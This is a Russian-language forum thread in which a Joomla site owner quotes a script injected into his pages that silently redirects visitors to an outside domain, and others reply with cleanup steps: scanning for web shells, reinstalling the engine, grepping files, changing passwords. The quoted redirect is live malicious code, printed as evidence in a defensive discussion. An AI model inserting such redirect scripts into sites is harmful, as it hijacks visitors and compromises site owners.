Сторонний код на сайте Joomla

R
На сайте с 28.05.2010
Offline
65
1210

Ситуация следующая - при заходе на сайт грузиться левый сайт. Обнаружил сторонний код в самом верху исходного кода страницы моего сайта.

Вот код:

<script>setTimeout( 'location="http://frgewger.moneyhome.biz/stream015/node.php";', 100 );</script>

Не могу найти в каком файле прописан код. Может кто-нибудь подскажет

K5
На сайте с 21.07.2010
Offline
209
#1

в шаблоне или в index.php, вариантов море

пробуйте залить движок поверх http://joomlacode.org/gf/project/joomla/frs/?action=index

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
draff
На сайте с 30.03.2010
Offline
65
#2

И еще нужно искать шелл,через который залили левый скрипт

Сканер айболит в помощь

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
-SkyLord-
На сайте с 08.08.2014
Offline
18
#3

В первую очередь закройте доступ к сайту на время поисков, к примеру временно замените .htaccess файл в корне сайта файлом с содержимым Deny from all После этого смените все пароли на сайт, панель управления, FTP, коннект на MySQL.

Если хостер предоставляет SSH к аккаунту то зайдя по SSH выполните следующую команду:

find /home/site/www -name '*' | xargs grep 'frgewger.moneyhome.biz'

/home/site/www - заменить на свой путь к корню сайта.

Данная команда пропарсит все файлы включая вложенные папки на данное содержание текста.

Если же доступа по SSH нет то скачайте по FTP целиком весь каталог сайта и воспользуйтесь каким либо парсером для поиска по файлам, к примеру очень удобна программа FindFiles

Эти методы должны помочь найти отредактированный файл.

Далее советую просмотреть файл менеджером или FTP клиентом все папки и файлы сайта и обращать пристальное внимание на дату изменения файлов, далеко не факт, что поставили только редирект и не оставили на сайте шелл или же не оставили еще какую то дырку!

Когда все найдете верните на место .htaccess и смените пароль на админку Джумлы.

Если ничего из вышеперечисленного не помогло значит редирект воткнули через MySQL так как это то же вполне возможно на Джумле, в этом случае через phpmyadmin воспользуйтесь поиском по базе.

Очень надеюсь что что то из перечисленного Вам поможет.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий